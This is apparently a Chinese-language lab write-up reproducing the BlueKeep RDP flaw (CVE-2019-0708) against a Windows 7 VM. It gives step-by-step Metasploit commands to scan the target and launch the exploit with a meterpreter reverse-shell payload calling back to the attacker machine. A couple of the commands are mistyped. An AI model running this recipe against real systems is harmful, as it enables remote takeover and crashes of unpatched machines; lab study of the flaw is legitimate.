CVE-2019-0708漏洞复现

漏洞概述

远程桌面服务高危远程代码执行漏洞(CVE-2019-0708),老是有系统爆这个漏洞,但是很少能有利用的,今天搭环境来测试以下利用条件。

涉及系统版本

Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

不涉及系统版本

windows 10
windows 8

漏洞复测

攻击机:kali2021 IP: 192.168.2.103
靶机:windows7 IP:192.168.2.109
CVE-2019-0708漏洞复现

1、搜索msf支持的0708模块

search 0708

CVE-2019-0708漏洞复现

2、利用扫描模块探测目标系统是否存在漏洞

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
use rhosts 192.168.2.109 //设置目标
run

CVE-2019-0708漏洞复现
表示目标存在0708漏洞

3、设置攻击模块参数

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //设置攻击模块
show options
set rhosts 192.168.2.109 //设置目标
set lhost 192.168.2.103  //设置shell监听IP,监听端口默认即可
set payload windows/x64/meterpreter/reverse_tcp //设置payload

CVE-2019-0708漏洞复现

4、设置攻击模式,最终攻击设置如下图

show optinos targets //查看攻击模块支持的系统
set target 1         //设置攻击模块模式1
show options

CVE-2019-0708漏洞复现

5、执行攻击获取meterpreter,看起来一切顺利

run

CVE-2019-0708漏洞复现

6、多运行几次payload,发现计算机蓝屏
CVE-2019-0708漏洞复现

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

上一篇:win7 安装 sp1记录


下一篇:windows server 2008 R2 SP1 upate报错80072EFE